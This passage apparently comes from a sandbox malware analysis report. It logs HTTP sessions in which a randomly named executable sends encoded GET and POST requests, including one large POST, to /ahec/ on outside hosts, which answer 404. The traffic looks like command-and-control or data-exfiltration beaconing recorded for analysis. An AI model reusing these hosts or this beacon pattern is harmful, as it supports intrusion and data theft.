44 53 49 7a 7a 77 38 4b 39 6d 72 74 71 69 64 48 53 66 66 53 36 4e 4a 69 6f 63 34 4d 6e 38 41 4a 37 77 69 32 39 77 41 50 70 61 72 34 73 48 57 42 70 49 4f 63 53 44 79 47 76 52 56 39 55 6b 44 79 74 64 72 44 4c 52 44 64 70 4d 2b 62 30 63 34 31 55 75 50 38 2b 41 77 2b 65 4f 62 35 74 59 5a 66 4d 58 72 66 4a 4a 66 34 31 75 4e 47 69 54 67 36 74 66 41 68 34 35 6d 76 6c 32 6c 73 79 56 37 67 76 42 58 68 6f 62 71 37 39 33 74 56 52 67 43 6d 54 44 55 34 58 6e 70 71 4e 2b 48 54 79 37 76 59 65 64 53 34 39 63 66 56 62 6b 31 64 55 50 6b 6d 4f 2b 55 34 42 62 49 47 39 2f 63 51 56 6c 36 50 48 79 49 75 59 55 4d 49 55 61 46 49 56 6e 50 50 61 45 37 73 48 6e 4b 76 58 46 34 45 69 6b 6e 76 70 30 57 4b 33 59 56 4b 57 78 30 75 4a 4c 33 57 2f 62 43 6c 70 4e 36 38 42 38 77 78 37 74 41 77 74 62 74 69 53 71 6c 68 48 53 7a 31 6e 6e 63 64 6d 65 74 5a 4d 73 68 61 63 32 53 33 32 53 6d 70 48 73 6f 76 63 47 73 6d 37 6d 4e 4c 79 33 57 48 4f 7a 73 69 4c 73 49 71 78 4b 5a 46 33 5a 63 54 63 34 44 2b 30 64 6e 6a 47 49 59 2f 69 37 47 6c 46 2f 53 6c 55 5a 55 37 36 63 78 72 5a 7a 7a 74 49 79 45 6e 6a 65 69 75 36 2f 42 6d 54 4d 54 79 4a 61 6b 2f 6e 51 57 6a 7a 6b 66 2b 36 6c 50 52 7a 51 54 50 45 48 68 42 6a 6b 39 5a 78 54 35 6c 74 38 74 52 36 43 30 42 51 4b 76 68 45 75 74 74 5a 77 37 52 47 44 2b 64 72 72 76 71 37 6d 47 59 78 64 67 34 71 6c 6d 64 75 51 34 48 43 6a 58 33 33 6a 32 33 79 4c 36 56 41 44 77 46 62 6f 6a 6c 36 34 4d 67 54 61 63 46 31 51 52 42 4b 70 71 53 65 4a 4f 48 67 45 77 68 41 56 67 6c 73 42 50 67 6b 6e 4c 71 74 63 35 6c 50 50 6c 68 44 4a 33 2b 35 41 56 46 4d 31 2b 78 59 79 34 6e 69 7a 5a 64 64 52 58 57 6b 78 59 59 65 37 68 31 6d 4a 39 63 76 6d 52 31 36 76 64 41 62 5a 70 51 31 73 64 48 46 4e 32 48 72 45 63 68 57 78 47 72 71 46 45 59 43 75 6d 51 64 52 4d 55 6a 34 47 35 44 66 62 2b 41 52 32 65 6e 39 55 4d 32 65 61 32 36 4f 32 58 61 2b 6d 30 73 67 32 2f 55 4e 42 43 64 31 4f 5a 33 62 41 69 66 37 66 59 72 47 34 31 4e 46 70 2f 4b 6e 4f 6f 58 58 49 51 30 35 6a 38 41 74 4f 6a 6a 66 48 63 69 35 70 54 77 2b 71 70 78 35 58 74 59 62 70 74 30 59 44 48 33 47 73 31 6c 31 69 36 33 66 73 64 4a 69 68 4c 6a 45 6f 30 6e 41 41 52 69 31 57 71 61 74 79 4a 51 77 33 6e 41 46 59 66 72 52 62 47 55 77 5a 6b 55 6e 6f 73 69 37 4d 52 6d 78 31 5a 70 73 2b 2b 74 79 31 48 70 53 53 57 42 2b 64 4c 37 70 67 6e 48 5a 49 50 33 59 32 36 33 6e 45 61 44 76 79 6a 6c 5a 43 6e 4b 64 73 48 4a 56 64 42 47 77 79 70 53 75 44 49 63 36 62
                                                                                                                                                            Data Ascii: XveXHZvx=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
                                                                                                                                                            Dec 8, 2023 14:52:23.430182934 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:23 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            32192.168.2.44977281.169.145.70805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:25.956589937 CET471OUTGET /ahec/?XveXHZvx=pHT1kOem2IT0Y9TJ94VCHNnbNLZhsvH3XSVhoxxlik7UiuURsLT/Jzy3sp/tZoydu20sa6TfNH7nZl1KjnhQP0JKKbiUNKMEcA==&l4xX=rDStpH0He HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Host: www.fam-scharf.net
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Dec 8, 2023 14:52:26.210994959 CET374INHTTP/1.1 404 Not Found
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:26 GMT
                                                                                                                                                            Server: Apache/2.4.58 (Unix)
                                                                                                                                                            Content-Length: 196
                                                                                                                                                            Connection: close
                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            33192.168.2.44977385.159.66.93805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:32.217535973 CET744OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 189
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 77 61 43 42 39 61 69 6c 63 6f 64 35 5a 32 32 4e 50 46 44 55 4e 57 54 6b 51 50 4d 63 65 42 75 65 59 39 6e 4e 2f 75 4c 6e 59 69 43 33 6e 66 46 61 45 6d 64 51 56 36 65 46 55 43 61 78 66 67 64 52 70 4c 2f 72 63 77 73 45 42 76 6f 59 6a 72 4f 53 50 44 44 4b 68 4c 77 54 45 34 70 6c 50 56 54 59 37 6f 75 38 46 4b 6f 2f 4e 52 30 78 6e 43 70 4b 61 70 50 46 79 67 75 64 73 6e 55 5a 43 34 38 45 6a 65 76 4d 58 62 63 7a 33 6e 45 56 2f 42 52 77 4e 6b 63 4d 42 2f 58 59 38 72 58 33 47 42 71 79 65 52 30 34 47 67 3d 3d
                                                                                                                                                            Data Ascii: XveXHZvx=NFtq1frL3yg1waCB9ailcod5Z22NPFDUNWTkQPMceBueY9nN/uLnYiC3nfFaEmdQV6eFUCaxfgdRpL/rcwsEBvoYjrOSPDDKhLwTE4plPVTY7ou8FKo/NR0xnCpKapPFygudsnUZC48EjevMXbcz3nEV/BRwNkcMB/XY8rX3GBqyeR04Gg==
                                                                                                                                                            Dec 8, 2023 14:52:32.558415890 CET225INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:32 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 19
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            34192.168.2.44977485.159.66.93805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:35.026890993 CET764OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 209
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 30 47 65 59 66 50 4e 2b 76 4c 6e 64 69 43 33 73 2f 46 54 4a 47 64 58 56 36 43 4e 55 43 57 78 66 68 39 52 70 4c 50 72 66 43 45 48 48 2f 6f 61 33 62 4f 55 4c 44 44 4b 68 4c 77 54 45 37 56 50 50 56 72 59 37 34 65 38 4b 50 63 34 41 78 30 77 78 53 70 4b 4d 70 50 42 79 67 75 46 73 69 77 6a 43 36 45 45 6a 66 66 4d 58 4b 63 30 2b 6e 45 58 67 52 51 63 65 33 68 66 4d 73 75 30 7a 5a 2f 71 59 46 37 47 62 45 59 72 42 56 70 33 75 4d 51 34 45 39 75 45 49 57 32 52 78 75 43 38 6d 47 67 3d
                                                                                                                                                            Data Ascii: XveXHZvx=NFtq1frL3yg1x6yB/9OleIdmVW2NBlDYNXvkQOYMZ0GeYfPN+vLndiC3s/FTJGdXV6CNUCWxfh9RpLPrfCEHH/oa3bOULDDKhLwTE7VPPVrY74e8KPc4Ax0wxSpKMpPByguFsiwjC6EEjffMXKc0+nEXgRQce3hfMsu0zZ/qYF7GbEYrBVp3uMQ4E9uEIW2RxuC8mGg=
                                                                                                                                                            Dec 8, 2023 14:52:35.367470026 CET225INHTTP/1.1 404 Not Found
                                                                                                                                                            Server: nginx/1.14.1
                                                                                                                                                            Date: Fri, 08 Dec 2023 13:52:35 GMT
                                                                                                                                                            Content-Length: 0
                                                                                                                                                            Connection: close
                                                                                                                                                            X-Rate-Limit-Limit: 5s
                                                                                                                                                            X-Rate-Limit-Remaining: 18
                                                                                                                                                            X-Rate-Limit-Reset: 2023-12-08T13:52:37.4097576Z


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            35192.168.2.44977585.159.66.93805016C:\Program Files (x86)\fvCwMkebvdlZnVAfIydJNuzaLtYKKNgsocDEVFzzoGRisGnQb\UHPrrMeffyCaz.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            Dec 8, 2023 14:52:37.823259115 CET10846OUTPOST /ahec/ HTTP/1.1
                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Host: www.magmadokum.com
                                                                                                                                                            Origin: http://www.magmadokum.com
                                                                                                                                                            Referer: http://www.magmadokum.com/ahec/
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Content-Length: 10289
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            Connection: close
                                                                                                                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                            Data Raw: 58 76 65 58 48 5a 76 78 3d 4e 46 74 71 31 66 72 4c 33 79 67 31 78 36 79 42 2f 39 4f 6c 65 49 64 6d 56 57 32 4e 42 6c 44 59 4e 58 76 6b 51 4f 59 4d 5a 79 65 65 62 73 33 4e 2f 4d 6a 6e 61 69 43 33 68 66 46 57 4a 47 63 53 56 36 61 4a 55 43 4b 62 66 6b 35 52 6f 6f 48 72 65 7a 45 48 4f 2f 6f 61 31 62 4f 56 50 44 44 6c 68 4c 41 4d 45 37 46 50 50 56 72 59 37 37 47 38 44 36 6f 34 43 78 30 78 6e 43 70 4f 61 70 4f 6d 79 67 32 56 73 6a 77 7a 42 4c 6b 45 74 63 33 4d 57 38 49 30 6d 33 45 76 6a 52 51 45 65 33 73 48 4d 73 43 4f 7a 59 4c 45 59 47 6e 47 49 68 5a 53 55 68 39 72 30 39 49 52 55 76 6d 49 47 68 48 45 31 38 6a 38 35 78 76 32 67 75 41 75 48 68 71 77 51 65 65 71 34 6e 68 4d 4c 2f 34 36 53 42 66 44 49 64 2f 63 4e 76 67 37 6c 39 6a 2b 51 63 71 51 36 6c 59 52 54 6e 7a 6a 70 49 6f 34 67 65 2b 6c 4d 55 55 61 69 5a 69 5a 42 78 65 6d 2b 53 57 49 48 38 67 62 45 64 34 41 59 6c 61 52 34 6c 56 6e 79 76 32 33 56 7a 52 55 73 59 34 42 67 4d 7a 44 69 48 6a 66 6b 65 69 38 61 54 71 2f 4c 44 61 4d 62 4b 41 79 33 2b 4f 44 76 54 4c 6f 42 55 66 72 50 62 70 65 46 6f 77 70 69 74 34 49 68 6f 53 4d 45 56 46 37 75 61 74 4f 2f 39 76 39 7a 72 54 64 61 79 55 73 4c 6f 31 49 75 66 4f 6c 68 68 46 43 58 4c 69 2f 6f 4a 34 37 36 34 63 69 68 6e 50 72 51 2b 78 63 43 54 48 36 70 43 75 2b 67 6e 4d 34 36 79 74 55 53 41 32 57 52 64 32 6e 2b 7a 74 39 61 54 46 68 59 53 61 48 6b 6e 48 4a 35 45 41 48 31 41 78 2b 7a 56 48 36 32 5a 44 79 35 34 49 57 73 35 35 44 57 50 6d 73 57 53 61 69 5a 4c 51 56 77 35 58 53 73 52 46 55 30 57 6c 43 70 33 62 50 2f 33 65 61 36 36 63 2f 49 50 53 45 70 39 43 34 69 49 53 73 6f 30 59 49 32 74 77 33 63 32 2f 61 4e 49 64 52 59 77 78 6a 68 76 62 42 4f 53 65 67 69 6a 6d 43 6e 64 37 59 65 44 4f 4b 32 7a 6b 73 33 2b 6d 65 6a 4d 70 37 50 73 56 50 74 31 4b 44 55 37 69 74 5a 37 59 61 34 55 30 6d 67 4d 61 32 33 6b 45 6c 31 6b 33 47 69 75 75 52 69 77 44 39 59 31 38 58 36 69 63 67 54 66 43 6d 33 44 71 64 50 46 75 70 64 4e 38 2f 75 53 61 68 79 54 2b 5a 49 70 36 4d 43 57 7a 36 52 4e 79 4b 64 33 70 63 68 76 2f 67 5a 52 42 35 42 6c 74 34 65 46 70 47 62 51 38 4c 6c 64 7a 6d 72 64 6d 57 51 2f 57 35 6b 6b 77 37 6b 4f 57 64 7a 46 4d 4d 35 6c 6f 65 39 70 36 38 77 67 61 5a 5a 33 64 54 4d 74 79 57 77 61 63 65 48 6b 64 30 4a 52 70 30 61 45 5a 4c 56 67 6c 5a 46 77 78 39 6a 41 75 2f 46 4c 42 4e 47 44 56 4c 6b 56 46 4a 75 69 30 42 62 62 62 4d 48 51 38 56 6f 61 47 61 36 46 42 49 50 76 51 7a 67 73 64 2f 4c 6c 6e 70 4e 66 45 48 62 69 6b 33 64 4b 45 72 77 31 32 51 53 61 30 78 54 4f 75 51 45 41 79 49 34 6f 2f 51 30 37 48 30 42 43 6b 70 76 4c 47 77 54 57 59 4e 36 6a 50 66 4f 59 41 41 74 6f 33 5a 58 62 33 79 67 43 55 4c 79 48 34 49 49 39 78 7a 64 31 49 2f 55 5a 41 37 52 44 4c 42 69 6e 77 55 74 78 4e 37 73 71 6f 4c 4a 51 37 59 6b 74 6a 49 32 34 44 54 48 45 30 6e 53 48 64 44 31 59 75 6f 64 56 4d 4f 50 41 36 59 34 6d 62 6d 68 6d 34 61 78 7a 62 41 2f 37 67 54 63 64 33 2b 49 76 30 7a 67 65 76 56 4e 64 55 46 48 5a 4b 57 72 41 39 63 57 2b 75 2b 56 6c 51 36 44 4b 37 69 35 70 49 2f 45 37 77 73 41 7a 61 66 6c 2f 7a 48 6f 4f 4f 31 68 6a 56 44 51 52 51 74 59 47 42 51 4f 63 44 79 74 42 7a 58 70 49 48 4d 55 64 31 73 4c 46 5a 68 52 43 45 6a 59 58 32 61 74 6a 37 6a 57 33 6b 31 41 6d 2b 69 35 70 5a 70 36 73 51 51 70 5a 30 76 78 64 43 74 6b 4c 79 6e 78 6c 48 47 56 36 44 38 67 75 32 6c 30 72 74 75 4c 56 48 4d 51 6f 2f 7a 49 56 56 56 37 4f 2f 70 4f 73 48 4e 63 49 53 66 47 31 47 51 53 6c 38 35 7a 52 71 79 77 49 59 54 67 4e 6d 47 6b 55 55 2f 31 30 2b 5a 75 51 49 31 65 34 42 43 33 30 78 4e 33 77 6c 33 45 70 77 6c 4a 73 2f 2f 4b 31 54 54 61 30 6b 6b 55 6a 33 4d 4f 33 2f 62 43 63 64 37 52 75 47 6e 6d 36 4e 74 56 62 69 67 66 6a 2f 61 4a 35 30 7a 63 37 68 47 4c 34 51 47 70 79 33 31 64 30 49 48 77 6d 5a 4c 37 62 38 48 76 7a 68 32 4d 43 6c 66 6b 6f 73 44 6d 4a 57 69 4d 44 56 2f 52 69 68 4a 66 4f 46 6c 4d 38 39 70 52 6d 41 35 42 37 56 65 54 63 6a 73 67 73 55 4a 53 39 49 77 53 49 69 4b 4b 6c 61 4a 45 47 4a 52 72 30 33 2f 32 75 72 55 7a 78 4c 42 6b 57 63 64 59 61 50 44 75 4a 7a 32 6b 64 66 44 51 45 43 5a 56 58 65 6d 70 6f 34 4d 6d 55 33 73 73 6b 34 56 50 76 4e 79 75 4e 69 68 43 71 76 57 7a 44 7a 6d 49 6b
